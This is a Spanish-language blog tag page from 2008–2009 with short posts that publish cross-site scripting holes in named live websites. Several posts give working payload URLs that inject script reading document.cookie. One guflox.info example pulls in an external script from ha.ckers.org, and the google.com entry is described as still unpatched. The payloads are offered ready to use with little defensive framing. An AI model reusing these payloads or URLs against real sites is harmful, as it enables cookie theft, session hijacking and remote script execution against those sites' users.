Mostrando las entradas con la etiqueta xss. Mostrar todas las entradas
Mostrando las entradas con la etiqueta xss. Mostrar todas las entradas

jueves, 25 de junio de 2009

Vunerabilidad xss en google.com

Hola a todos, aqui les dejo esta vulnerabilidad descubierta por Black-Hacker en google.com. Nos vemos.

https://www.google.com/support/bin/answer.py?%22%3E%3C/script%3E%3Cscript%3Ealert(%22BlackHacker[dot
]Coder[at]Gmail[dot]com%22)%3C/script%3E=00000&hl=tr

Aun no ha sido corregida, nos vemos.

Alerta en anoox.com

Navegando nuevamente por la red me encontre con el sitio anoox.com, el cual tiene un agujero de seguridad del tipo xss en la casilla de busqueda.

tan sólo escriban:

<script>alert(document.cookie);</script>

y veran el contenido de la cookie, ahi tienen la vulnerabilidad.

Nos vemos.

lunes, 29 de septiembre de 2008

Multiples errores en susjed.com


Una vez más, recorriendo la web... me encontré con este sitio, parece ser de origen ruso. Como que no le pagan bien al desarrollador web porque su sitio tiene más agujeros que un queso gruyere.



Muy bien:

El sistema de búsquedas del sitio no valida los campos de entrada y es objeto de ataques XSS.
Dentro del sitio hay instalados foros que pueden ser objeto del ataque. Nos vemos.

Urls:
http://dict.susjed.com/index.php?lang=en_hr&word=%3Cscript%3Ealert(%27alerta:%20%27+%2B+document.cookie)%3B%3C%2Fscript%3E

domingo, 21 de septiembre de 2008

Alerta Grave de XSS en guflox.info


Solo vean la imagen, no se valida correctamente la variable la búsqueda de datos. :

Variable afectada:
http://guflox.info/buscar.php?q=

Ejemplo:
http://guflox.info/buscar.php?q=%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E

Los administradores ya se dieron cuenta del error.

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)